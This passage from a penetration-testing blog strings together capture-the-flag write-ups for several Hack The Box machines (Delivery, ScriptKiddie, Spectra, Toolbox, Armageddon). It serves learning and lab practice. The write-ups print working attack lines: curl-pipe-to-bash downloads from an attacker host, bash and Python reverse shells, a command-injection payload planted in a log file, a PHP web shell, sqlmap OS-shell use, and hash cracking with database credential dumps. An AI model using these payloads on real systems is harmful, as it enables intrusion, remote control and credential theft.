With the credentials, I was able to log in to MariaDB and query the databases. First, I asked MariaDB to show me the databases. As a result, I learnt that there was a database called mattermost. Next, I told MariaDB to use that database and asked it to show me the tables. The results revealed that there was a Users table. I then asked MariaDB to describe the table so that I could get the columns. Finally, I dumped the contents of a few columns from the Users table.

maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
MariaDB [(none)]> show databases;
MariaDB [mattermost]> show tables;
MariaDB [mattermost]> describe Users;
MariaDB [mattermost]> select Id, Username, Password from Users;
Delivery SQL Database

Delivery Privilege Escalation

The Users table included the password hash for the root user. After a bit of searching, I learnt that the type of hash was a bcrypt hash. I tried to blast the hash with rockyou.txt but after watching IppSec’s video I learnt that it wouldn’t work. Instead, I took the PleaseSubscribe! password from the MatterMost server and saved it to a file. I then saved the hash to a file and used hashcat with the best64.rule file to crack the hash.

┌──(kali㉿kali)-[~/HTB/Delivery]
└─$ hashcat -m 3200 hash.txt password.txt -r /usr/share/hashcat/rules/best64.rule
Hashcat

With the password cracked, I was able to switch to the root user and capture the root.txt flag and complete the box.

maildeliverer@Delivery:/opt/mattermost/config$ su root
Password:
root@Delivery:/opt/mattermost/config# cat /root/root.txt
bb6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓6be

Delivery Learnings

I thought this was a rather unique box compared to other boxes that I’ve completed. The initial foothold didn’t exploit a known vulnerability or configuration issue. It was more about understanding the psychology of the person who created the environment and exploiting their oversights. I thought it was really interesting and hopefully, it has changed the way I will think about security in the future.

The privilege escalation was great, I haven’t used hashcat rules before so I got to learn something new. All I want from completing a box is to learn something new or reinforce existing knowledge. This box fulfilled both of those so I’m happy. I don’t think I would have been able to complete this without the walkthrough but it’s hard to say. Thanks for the Box.

Hack The Box – ScriptKiddie

ScriptKiddie is an easy Linux box created by 0xdf on Hack The Box and was released on the 6th Feb 2021. Hello world, welcome to Haxez where today I will explain how I hacked ScriptKiddie. In order to complete this box it is recommended that you have basic Linux and Bash knowledge. It is also recommended that you know how to use Metasploit. By completing this box you will learn to exploit CVE-2020–7384. How to perform OS command Injection in command arguments, and how to run system commands from Metasploit console.

ScriptKiddie Service Enumeration

First, I connected to the Hack The Box VPN and spawned the box. As soon as I received the box’s IP address, I sent a ping to ensure it was online. After the box responded, I performed a Nmap scan to check all ports, request service versions and run default scripts. I set the minimum packet rate to 10000 packets and saved the output in all formats to files named scriptkiddie. As a result, I learnt that ports 22 for OpenSSH 8.2p1 and port 5000 for Werkzeug HTTP were open. Furthermore, the SSH banner revealed that it was an Ubuntu box.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ sudo nmap -sC -sV -p- 10.129.95.150 --min-rate 10000 -oA scriptkiddie
ScriptKiddie Service Enumeration

ScriptKiddie Web Application Enumeration

As it’s never SSH, I went to view the application on port 5000. I launched Burp suite and opened the Burp browser through the proxy settings. The application loaded and I was amused by what I saw. Initially, I thought the name of the box was in reference to the skill level required. However, it seems that my target is a hacker or a script kiddie to be specific.

ScriptKiddie Web Application Enumeration

After poking at the application and testing for things like SSRF, I ran gobuster using the raft-small-words.txt wordlist from SecLists. Unfortunately, I didn’t find anything interesting but the practice is good for developing muscle memory and a methodology.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ sudo gobuster dir -u http://10.129.95.150:5000/ -w /media/sf_OneDrive/SecLists/Discovery/Web-Content/raft-small-words.txt -o gobuster
Gobuster

Web Application Nmap Feature Fuzzing

I ran ffuf against the Nmap scan feature. I tested the functionality in Burp to see what data was required. Then I constructed the command from those results. First I specified the target using the -u argument and supplying the URL. Next, I specified the data which was an IP address and the scan action which you can see below.

Web Application Nmap Feature Fuzzing

After that, I specified the special-chars.txt wordlist from SecLists. Finally, I used the -x argument to set Burp as a proxy. I ran the command but the responses weren’t correct. They didn’t contain the results of the Nmap scan. Looking at the request, I discovered that the Content-Type header wasn’t being supplied. I added this to the command and ran it again. The generic response size was 2145 so I added a filter for that and was able to identify a “bad character”.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ ffuf -u http://10.129.95.150:5000/ -d 'ip=127.0.0.1FUZZ&action=scan' -w /media/sf_OneDrive/SecLists/Fuzzing/special-chars.txt -H 'Content-Type: application/x-www-form-urlencoded' -x http://127.0.0.1:8080 -fs 2145
ScriptKiddie ffuf

Unfortunately, the & symbol was not a bad character. URL encoding the character and sending the request through Burp produced an invalid IP address error. It was only showing a different file size because it was a valid request. Back to testing.

Web Application Searchsploit Feature Fuzzing

I started poking at the sploits feature by searching for vulnerabilities. One interesting behaviour that I observed was searching for ms17–010 (Eternal Blue) produced a warning message. The warning message advised me that they would hack me for trying to hack them. I suspected that the hyphen character was triggering some input validation. Despite the warnings, I continued poking and learnt that the input was being passed to searchsploit. If Python was using exec or eval then I could get code execution.

Web Application Searchsploit Feature Fuzzing

First, I reloaded the previous ffuf command and removed the file size filter. Next, I change the value of the data value to include the search and action parameters. I wanted to fuzz the value of the search parameter so I added FUZZ to the end of it. I ran the scan and identified the default file size. Finally, I ran the scan again but filtered out the file default file zie. As a result, I learnt that & symbol, a full stop or period symbol, and the plus symbol were creating different responses. Unfortunately, looking at the responses from the server these different file sizes were expected responses. The rest of the fuzz requests produced errors but the and, plus and period symbols were all valid requests.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ ffuf -u http://10.129.95.150:5000/ -d 'search=testFUZZ&action=searchsploit' -w /media/sf_OneDrive/SecLists/Fuzzing/special-chars.txt -H 'Content-Type: application/x-www-form-urlencoded' -x http://127.0.0.1:8080 -fs 2171
FFUF

Web Application Msfvenom Feature

The final feature of the application allowed the user to generate payloads using msfvenom. It was time to use the Script Kiddies’ own application against them. By utilising my elite hacking skills I leveraged the application searchsploit functionality to discover a vulnerability in msfvenom. Ok, back to reality, certain versions of msfvenom are vulnerable to command injection through the APK template. The Script Kiddie was kind enough to give us a template upload feature.

Scriptkiddie hacker tools

On my attack box, I used searchsploit with the -m argument to copy the exploit to my current working directory. Next, I edited the exploit and changed the payload to a cURL command that downloads and executes my shell script. Admittedly, I’m not quite sure how the exploit works. I’m currently watching IppSec’s video and he’s going to explain it at the end.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ searchsploit -m multiple/local/49491.py
# Change me
payload = 'curl 10.10.14.54/shell.sh|bash'
Python Payload

Initially, I thought that I had to upload the Python script as the template. That does seem rather foolish now. The Python script generates the APK template which I then need to upload to the box. Next, I created my shell script.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.54/1337 0>&1

Then, I started a Python webserver on port 80 to host the file.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www]
└─$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

After starting the server, I set up my netcat listener to listen on the port specified in the shell script.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www]
└─$ sudo nc -lvnp 1337
listening on [any] 1337 ...

Script Kiddie Foothold

With the web server and listener running, I ran the Python script to generate the APK. Honestly, I didn’t expect this to work the first time. I’ve completed around 70 easy boxes now and I always tend to struggle with “complex” payloads. Granted, it probably isn’t that complex compared to insane boxes but its all subjective I suppose.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie]
└─$ python3 49491.py
Generating APK

Next, I populated the msfvenom settings on the target application. I selected Android for the target OS, 127.0.0.1 for the LHOST and selected the malicious APK for the template. After populating the parameters, I hit submit. The application thought about it for a while but then the first stage of the attack triggered. The server downloaded the shell.sh script from my webserver, and shortly after that, the reverse shell came back. This is by far one of the coolest attack chains I’ve ever successfully performed.

Reverse Shell Attack Chain

From here, I was able to capture the user flag.

┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www]
└─$ sudo nc -lvnp 1337
[sudo] password for kali:
listening on [any] 1337 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.95.150] 35960
bash: cannot set terminal process group (938): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ cat ~/user.txt
cat ~/user.txt
ca0▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ec0

ScriptKiddie Host Enumeration

Now that I had authenticated access to the box, it was time to perform some more enumeration. In order to capture the root flag, I will need to elevate my privileges. The only way to do that is through enumeration. However, first I upgraded my terminal using the Python trick.

kid@scriptkiddie:~/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
kid@scriptkiddie:~/html$ ^Z
zsh: suspended sudo nc -lvnp 1337
┌──(kali㉿kali)-[~/HTB/ScriptKiddie/www]
└─$ stty raw -echo; fg
[1] + continued sudo nc -lvnp 1337
kid@scriptkiddie:~/html$ export TERM=xterm
export TERM=xterm

Admittedly, the previous step was a bit pointless as I dropped an SSH key into the user’s authorized keys. I then connected to the box via SSH using the private key. Once on the box, I performed some manual enumeration and learnt there was another user called pwn. Furthermore, the pwn user had a readable script in their home directory named scanlosers.sh.

ScriptKiddie User Own

Reviewing the script, it is setting the log variable to /home/kid/logs/hackers. Next, it is changing the directory to the /home/pwn directory. After changing the directory, it uses cat to read the log file. Next, it uses space as a delimiter on the third field. It then passes the results to a while loop as an IP address and uses nmap to scan the IP.

losers script

ScriptKiddie Lateral Movement

Now that I understood what the script was doing, I should be able to craft a payload that gets executed. By echoing a payload to the /home/kid/logs/hackers file, the payload should get executed. However, I need to ensure that the payload is within the third field of the log. I started a netcat listener on port 1338 and then used echo to add the following payload to the log file.

kid@scriptkiddie:~$ echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.14.54/1338 0>&1")' > /home/kid/logs/hackers

The a and b part of the payloads takes up the first two fields. The reverse shell is then added to the third field which gets executed by the script. As a result, I received a reverse shell and now had access to the box as the pwn user.

reverse shell

ScriptKiddie Privilege Escalation

Now that I had access as the pwn user, I ran sudo -l to see if they could execute any commands with sudo privileges. As a result, I learnt that they could run Metasploit.

Netcat listener

With that in mind, I launched Metasploit with sudo and then dropped into the ruby shell as root which allowed me to capture the root flag.

msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object
system("/bin/bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>> system("/bin/bash")
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /root/root.txt
ab9▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓55c

ScriptKiddie Learnings

This is a box that I’m going to have to come back to at a later date. I understood the attack chain and why most things were vulnerable, but I couldn’t identify them. The initial foothold was a lot of fun. However, I definitely wouldn’t have suspected that particular feature to have the vulnerability. Given that there were only three features, I may have stumbled upon it eventually but I guess that’s where experience comes in.

Once on the box, I struggled to understand what to do next. Admittedly I should have checked for other users. I also learnt that my brain immediately goes into panic mode when trying to read code. I’m not a master at bash but I can read and write basic scripts. I don’t know why my immediate reaction was “This is too hard”. Then again, I wasn’t quite sure what I was looking for.

If I’m being honest with myself, I don’t know why my payload was executed. I understand the logic of the script but I don’t know at which point it executes the reverse shell. I assume that it’s happening before it gets passed to the tool because the tool would have produced an error. But then does the rest of the script still get executed? Surely if it did, it would also result in an error as the tool is still receiving invalid input. I assume that the script hangs once it executes the payload and then I receive the reverse shell. I will have to come back to revisit it. Anyway, I struggled with this box but learnt a lot so thanks for the box.

Hack The Box – Spectra

Spectra is an easy ChromeOS box created by egre55 on Hack The Box and was released on the 27th of February 2021. Hello world, welcome to haxez where today I will explain how I hacked Spectra. To hack Spectra it is recommended that you have web enumeration and Linux enumeration skills. By owning Spectra you will learn lateral movement, file system permissions and sudo exploitation skills.

Spectra Enumeration

After spawning the box, I sent a ping request to check if I could talk to the box. Next, I ran a Nmap scan against all ports, requesting service versions and running default scripts. In addition, I set the minimum packet rate to 10000 packets per second and saved the output to all formats. As a result, I learnt that port 22 for OpenSSH 8.1, Port 80 for Nginx 1.17.4 and port 3306 for MySQL were open.

┌──(kali㉿kali)-[~/HTB/Spectra]
└─$ sudo nmap -sC -sV -p- 10.129.253.204 --min-rate 10000 -oA spectra
Spectra Enumeration

Web Application Enumeration

Next, I navigated to the IP address in my browser and a site loaded and presented two links. Clicking on each of the two links resulted in an error in Burp. In short, the links were attempting to load the domain spectra.htb but because that domain doesn’t resolve to an IP address, it doesn’t work. In order to make it work, I added the IP address and domain to my host file.

┌──(kali㉿kali)-[~/HTB/Spectra]
└─$ echo "10.129.253.204 spectra.htb" | sudo tee -a /etc/hosts

The Test link took me to a page with a database connection error. Initially, I didn’t think much of it but removing the index.php file from the URL revealed that directory listing was enabled.

Directory listing

The directory listing revealed a file named wp-config.php.save. The wp-config.php file contains the database connection details for WordPress sites. However, attempting to view that file will force the server to process the PHP rather than display the contents. Since the wp-config.php.save file doesn’t have a .PHP extension, I was able to view it by viewing the page source. I wasn’t able to log in to MySQL with the credentials but they could come in handy later.

Wordpress Configuration File

The second link took me to a WordPress site titled Software Issue Management. I could see that there was a user called administrator but other than that not much else. I navigated to the wp-login.php URL and tried the password that I found with the administrator user. The site kept trying to load over HTTPS which caused errors but forcing it to HTTP solved those issues.

Wordpress Admin Area

Spectra Foothold

I used the Theme editor to edit the 404 page of one of the unused themes. In short, I slipped a web shell into the page. As a result, when visiting the 404.php page directly and passing it the cmd parameter, I should be able to perform code execution.

<?php system($_REQUEST['cmd']); ?>
Wordpress Reverse Shell

Next, I navigated to the 404 page and passed the id command to the cmd parameter. As a result, the details for the nginx user were returned. Code execution confirmed.

http://spectra.htb/main/wp-content/themes/twentynineteen/404.php?cmd=id
web shell command execution

I ran into issues here and decided to go nuclear. For some reason, I wasn’t able to send myself a reverse shell via the web shell. I created a bash script which I hosted with a Python web server. I tried to curl the script and pipe it to bash but didn’t receive anything. Furthermore, I also downloaded the script with wget, and made it executable but when executing it, no reverse shell came back. For that reason, replaced the 404.php with the Pentest Monkey reverse shell. It wasn’t pretty but I was able to get a shell on the box as the nginx user.

PHP Reverse Shell
┌──(kali㉿kali)-[~/HTB/Spectra]
└─$ sudo nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.253.204] 34768
Linux spectra 5.4.66+ #1 SMP Tue Dec 22 13:39:49 UTC 2020 x86_64 Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz GenuineIntel GNU/Linux
02:02:28 up 1:42, 0 users, load average: 0.11, 0.05, 0.01
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=20155(nginx) gid=20156(nginx) groups=20156(nginx)
$ whoami
nginx

Host Enumeration

After landing on the box I started enumerating the system. I checked the /etc/lsb-release file to identify the Operating System. To my surprise, It turns out that the box is using Chrome OS which probably had something to do with my reverse shells not working. Despite owning a Chromebook years ago, I have no idea how one works.

cat /etc/lsb-release 
GOOGLE_RELEASE=87.3.41
CHROMEOS_RELEASE_BRANCH_NUMBER=85
CHROMEOS_RELEASE_TRACK=stable-channel
CHROMEOS_RELEASE_KEYSET=devkeys
CHROMEOS_RELEASE_NAME=Chromium OS
CHROMEOS_AUSERVER=https://cloudready-free-update-server-2.neverware.com/update
CHROMEOS_RELEASE_BOARD=chromeover64
CHROMEOS_DEVSERVER=https://cloudready-free-update-server-2.neverware.com/
CHROMEOS_RELEASE_BUILD_NUMBER=13505
CHROMEOS_CANARY_APPID={90F229CE-83E2-4FAF-8479-E368A34938B1}
CHROMEOS_RELEASE_CHROME_MILESTONE=87
CHROMEOS_RELEASE_PATCH_NUMBER=2021_01_15_2352
CHROMEOS_RELEASE_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_BOARD_APPID=87efface-864d-49a5-9bb3-4b050a7c227a
CHROMEOS_RELEASE_BUILD_TYPE=Developer Build - neverware
CHROMEOS_RELEASE_VERSION=87.3.41
CHROMEOS_RELEASE_DESCRIPTION=87.3.41 (Developer Build - neverware) stable-channel chromeover64

I read through the official walkthrough and watched IppSec’s video to find out how to proceed. I hosted LinPEAS on a web server and used cURL to download it and piped it to bash.

Spectre LinPEAS

Reading through the results, It turned out there is an auto-login feature. This feature loads after boot and I believe it allows the user to automatically log in. However, in order for this to work, it needs to retrieve the user’s password. The user’s password is saved in the /etc/autologin/passwd file. With this password, I was able to SSH to the box as Katie and capture the user flag.

┌──(kali㉿kali)-[~/HTB/Spectra]
└─$ ssh [email protected]
The authenticity of host '10.129.253.204 (10.129.253.204)' can't be established.
RSA key fingerprint is SHA256:lr0h4CP6ugF2C5Yb0HuPxti8gsG+3UY5/wKjhnjGzLs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.253.204' (RSA) to the list of known hosts.
([email protected]) Password:
katie@spectra ~ $ ls
log user.txt
katie@spectra ~ $ cat user.txt
e89▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓130

ChromeOS Initctl

Once logged in as Katie, I ran sudo -l and learnt that Katie could execute /sbin/initctl as sudo with no password. However, I didn’t have a clue what initctl was. GTFO Bins didn’t have any matches for the binary so it was back to investigating. I cheated and used ChatGPT and here’s what ChatGPT had to say about it.

In Chrome OS, initctl is a command used to manage system services. It allows you to start, stop, restart, and check the status of services on the system. initctl is used by the system’s init system, which is responsible for starting and managing system processes and services.

Chrome OS is based on the Linux operating system and initctl is a command from the Upstart init system that was commonly used on Linux systems in the past. However, in recent versions of Chrome OS, initctl has been replaced by systemctl, which is part of the newer systemd init system.

initctl

Spectra Privilege Escalation

Since Katie can control the services, she should be able to restart them. If I can find a service owned by root that I can edit, I could restart the service and execute commands as root. I checked the /etc/init directory for services and there were several test services that stood out. They were owned by root but the group ownership was developers. Since Katie was also a member of the developers’ group, she could edit the files.

Spectra services

First, I used initctl to stop the test service. If you don’t stop the service first and then stop the service after you make the changes, it reverts the changes.

katie@spectra ~ $ sudo /sbin/initctl stop test

Next, I modified the test file and added the following payload.

python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.54",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Spectra Python reverse shell payload

After that, I started the netcat listener on my attack box and then started the test service.

katie@spectra ~ $ sudo /sbin/initctl start test

The reverse shell came back and I was able to capture the root flag.

┌──(kali㉿kali)-[~/HTB/Spectra]
└─$ sudo nc -lvnp 1234
[sudo] password for kali:
listening on [any] 1234 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.253.204] 33618
# whoami
root
# cat root.txt
cat: root.txt: No such file or directory
# cat /root/root.txt
d44▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓2fc

Spectra Learnings

I found this difficult for an easy box but I believe that’s mostly due to how unfamiliar I am with Chrome OS. Ok, it’s Linux but it didn’t behave as expected when trying to get a reverse shell. This threw me off for a bit. The initial enumeration was fun and it taught me not to make assumptions about things. As soon as I saw the database error on the test link, I wrote that off as an attack vector. I realise how silly that is now since it makes sense that it would be more of an attack vector.

I was stumped on the privilege escalation. LinPEAS didn’t scream the answer at me in highlighted red and yellow text. I also didn’t get the password printed to the screen like IppSec did in his video so that was odd. While I found it difficult, I did get to learn about ChromeOS which was nice. However, it seems that Google has since switched to systemd for service management. Anyway, this was a fun box. Thanks

Hack The Box – Toolbox

Toolbox is an easy Windows machine created by MinatoTW on Hack The Box and was released on the 12th of March 2021. Hello world, welcome to Haxez where today I will explain how I hacked Toolbox. In order to complete this box you will need basic web knowledge. By completing this box you will learn to leverage PostgreSQL SQL Injection for RCE and Docker Toolbox exploitation.

Toolbox Enumeration

First, I spawned the box and sent a single ping request to check if I could talk to it. Next, I performed a Nmap scan that scanned all ports, requested service versions and ran default scripts. I saved the output in all formats to files named Toolbox. I instructed Nmap to send a minimum of 10000 packets per second. However, I wouldn’t advise you to do this on real engagements. 10000 packets per second are quite a lot and could congest the network and cause disruption on the target host.

As a result of the scan, I learnt that the host had a plethora of ports open including 21 for FTP. Furthermore, FTP also allowed anonymous access. SSH was listening on port 22 with the banner informing me that it was OpenSSH for Windows 7.7. Port 443 for HTTP with the banner advising me that it was Apache 2.4.38. The SSL certificate’s common name was admin.megalogistics.com which could be useful later. Finally, ports 139, and 445 were open for SMB. A few other ports were open including 5985 for WinRM.

My first thought was that this box appears to be having an identity crisis. It’s a Windows box with SSH enabled and was also running an Apache webserver. I would have expected to see IIS.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ sudo nmap -sC -sV -p- 10.129.96.171 --min-rate 10000 -oA Toolbox
Toolbox Enumeration

Toolbox Service Enumeration

Starting with the lowest port number, I connected to the FTP service using the username anonymous. I submitted an empty password and was granted access. Next, I listed out the contents of the FTP directory and saw an executable named docker-toolbox.exe. I suspected that it was just there to give me a hint about the environment but I downloaded it anyway. Other than that, there wasn’t anything else on the FTP server.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ ftp 10.129.96.171
Name (10.129.96.171:kali): anonymous
ftp> ls
ftp> get docker-toolbox.exe
FTP Enumeration

Since SSH was unlikely to be the attack vector I moved on to SMB. I was optimistic that null sessions might be enabled. Unfortunately, they weren’t but through using crackmapexec, I was able to learn the hostname and domain name. The hostname was TOOLBOX and the domain name was Toolbox. For practice, I also ran smbmap and smbclient.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ crackmapexec smb 10.129.96.171 -u '' -p '' --shares
SMB Enumeration

Web Application Enumeration

With the low-hanging fruit picked, I headed to the web application. I visited the IP address over HTTPS in my browser which loaded a logistics web application. I have to commend the author of the box for this one. It seemed like they put a lot of effort in to this application. It had the generic Lorem ipsum text but it felt real.

Web Application Enumeration

I was capturing the requests and responses in Burp when I noticed something interesting. I ran a few other tools like whatweb too and they all reported the same thing. The HTTP server header was reporting that it was Apache 2.4.38 for Debian. As this is a Windows box, I was now certain that the web application was running inside a Docker container.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ whatweb -a3 https://10.129.96.171/ -v
Toolbox Whatweb

SSL Certificate Subdomain

I poked around the web application for a bit but I suspected that the subdomain that Nmap found was the path forward. I used the echo tool to append the subdomain to my host file.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ echo "10.129.96.171 admin.megalogistic.com" | sudo tee -a /etc/hosts

After that, I visited the subdomain in my browser and was presented with a login page. I tried a variety of easily guessable passwords like admin and password but they all failed. Next, I moved on to trying special characters like the single quotation mark. Bingo, the single quotation mark escaped the SQL query and produced an error. The login form was vulnerable to SQL Injection.

Toolbox web application error

I looked through my Burp HTTP history and found the log-in POST request. I saved this request to a file so that I could feed it to SQLMap.

Burp

Toolbox SQL Injection

First, I ran SQLMap with the batch argument so that it would automatically choose the default option in the prompts. Additionally, I used the force SSL option since the target was using SSL. After the initial tests confirmed SQL injection, I enumerated the database. I dumped the contents of the user’s table from the public database. Please note the image below has been edited to only show the relevant information.

Toolbox SQLMAP

Next, I used the tool hash-identifier to identify the hash. The error message produced when identifying the SQL injection suggested it was an MD5. I had no doubt that it’s an MD5 but this way I get to show off a cool tool.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ hash-identifier 4a100a85cb5ca3616dcf137918550815
Hash Identifer

Next, I attempted to crack the hash with Hashcat and John using the rockyou wordlist. Unfortunately, neither of them was able to crack the hash. I also uploaded the hash to crackstation.net but it also didn’t recognise the hash. Moving on, I used a traditional logic authentication bypass to log in to the application. By submitting the logic of “or 1=1 — -” to the login form, it bypasses authentication regardless of the password being correct.

SQL injection authenticiation bypass

However, this seemed to be a dead end. Other than being able to retrieve a few email addresses, there wasn’t much I could do.

Toolbox authenticated

Toolbox SQL Injection To Foothold

With the application thoroughly investigated, I went back to the drawing board. The help menu for SQLMap shows that there is a –os-shell command. The os shell will prompt for an interactive operating system shell. I appended this command to my initial SQLMap command and successfully received a command shell.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ sudo sqlmap -r request --batch --force-ssl --os-shell
SQLMAP OS Shell

I set up a netcat listener on my attack machine and then sent myself a reverse shell via the os-shell.

os-shell> bash -c "bash -i >& /dev/tcp/10.10.14.54/9001 0>&1"

The reverse shell connected back to my netcat listener and I was able to capture the user.txt flag.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ sudo nc -lvnp 9001
[sudo] password for kali:
listening on [any] 9001 ...
connect to [10.10.14.54] from (UNKNOWN) [10.129.96.171] 50127
bash: cannot set terminal process group (1574): Inappropriate ioctl for device
bash: no job control in this shell
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cd ~
postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt
cat user.txt
f01▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓c6a flag.txt

Toolbox Host Enumeration

First things first, I located the Python3 and Bash binaries so that I could upgrade my shell. Using the Python3 trick, I upgraded my shell to make it more usable.

postgres@bc56e3cc55e9:/var/lib/postgresql$ which python3
/usr/bin/python3
postgres@bc56e3cc55e9:/var/lib/postgresql$ which bash
/bin/bash
postgres@bc56e3cc55e9:/var/lib/postgresql$ python3 -c 'import pty;pty.spawn("/bin/bash")'

Confident that I was inside a Docker container, I ran ifconfig. I could have ran LinPEASS which would have confirmed it but the following way works too. A tell-tale sign of being inside a container is that the IP address doesn’t match the target. The results of ifconfig showed that the IP address of the host was 172.17.0.2. The Docker host was likely going to be the first IP address in the subnet (172.17.0.1).

Toolbox Ifconfig

Privilege Escalation

According to the boot2docker github page, you can ssh to the docker host using the username docker and the password tcuser.

Docker Toolbox Credentials

With this information, I attempted to ssh to the 172.17.0.1 IP address. However, I received SSH key permission errors on my first attempt. Initially, I had fully upgraded my shell by exporting term to xterm and that caused issues. After reconnecting and spawning a bash shell, I could SSH to the host. Once on the host, I ran sudo -l and learnt that I could switch the user to the root user without a password.

SSH To Docker Host

I switched to the root user and started enumerating the system. As it was a Windows system, I checked the contents of the Administrator user’s home directory. As a result, I found the Administrator user’s SSH private key.

Administrator Private Key

I quickly stole the private key and saved it to a file on my attack machine. I gave the key 600 permissions and used it to SSH to the target as the administrator user. From here I was able to steal the root.txt flag.

┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ vim key
┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ chmod 600 key
┌──(kali㉿kali)-[~/HTB/Toolbox]
└─$ ssh -i key [email protected]
administrator@TOOLBOX C:\Users\Administrator\Desktop>type root.txt
cc9▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1b3

Toolbox Learnings

The Toolbox box was a lot of fun. Admittedly, I was disappointed that it was more Linux than Windows. However, that feeling passed once I completed the box. I learnt something new from the foothold but did fall down some rabbit holes on the way. Once on the box, I struggled with my shell not allowing me to SSH to the next host. This is something I need to investigate further as I don’t understand what was wrong.

The privilege escalation taught me about the particular quirks of the service in use. Once I knew what needed to be done, the rest was easy. This box taught me a few new things but also made me aware that my skills are improving. I was able to quickly identify that something suspicious was going on. Anyway, this box was a blast. Thanks for the box.

Hack The Box – Armageddon

Armageddon is an easy Linux box created by bertolis on Hack The Box and was released on the 27th of March 2021. Hello world, welcome to Haxez where today I will explain how I hacked Armageddon. The skills required to complete this box are Basic Linux Knowledge. The skills learnt from completing this box are Drupal exploitation and Snap package manager exploitation.

Armageddon Enumeration

I connected to the Hack The Box VPN and clicked the button to spawn the box. To ensure I could talk to the box, I sent a single ping request and the box kindly responded. Next, I ran a Nmap scan that targeted all ports, enumerated service versions, ran default scripts and saved all output types. As a result, I learnt that ports 22 for SSH and 80 for HTTP were open. Furthermore, I learnt that the webserver was running Apache 2.4.6 and that the application used the Drupal Content Management System.

┌──(kali㉿kali)-[~/HTB/Armageddon]
└─$ sudo nmap -sC -sV -p- 10.129.48.89 --min-rate 10000 -oA Armageddon
Armageddon Enumeration

Web Application Enumeration

The Nmap scan identified a number of files that contained useful information. For example, the CHANGELOG.txt file disclosed the version history of Drupal 7. The changelog showed that the last update was 7.5.6, As a result, I was able to search for vulnerabilities affecting that particular version of Drupal.

Web Application Enumeration

I used searchsploit to search for vulnerabilities that affected Drupal version 7.56. The results indicated that there were several authenticated and unauthenticated remote code execution vulnerabilities. Furthermore, a number of these vulnerabilities had Metasploit modules.

┌──(kali㉿kali)-[/opt/droopescan]
└─$ sudo searchsploit Drupal 7.56
searchsploit

Armageddon Foothold With Drupalgeddon

First, I launched Metasploit with the msfconsole command. Next, I searched for drupalgeddon2 which produced 1 result. I selected the module by using the use command followed by the module number displayed in the search results. After that, I configured the module by setting the RHOSTS parameter to the IP address of the target. Finally, I set the LHOST parameter to tun0 (my VPN interface) and then ran the exploit. After a brief period, I received a meterpreter session.

Metasploit

Time to start pillaging. Now that I had a shell on the box, I started looking for useful information. I knew that Drupal was a database-powered website so started looking for the database configuration file. After a quick Google search, I learnt that Drupal stores the database connection details in a file called settings.php in the sites/default directory. I viewed the contents of the file and stole the credentials.

Unfortunately, the shell didn’t play well when logging into the database. When running queries, the results weren’t returned to the terminal. I’m not entirely sure what the problem was but it meant I had to change my approach. I used the following commands to retrieve the users from the user’s table.

mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -e 'show databases'
mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'show tables'
mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'describe users'
mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'select uid,name,pass,login from users'

uid name pass login
0 0
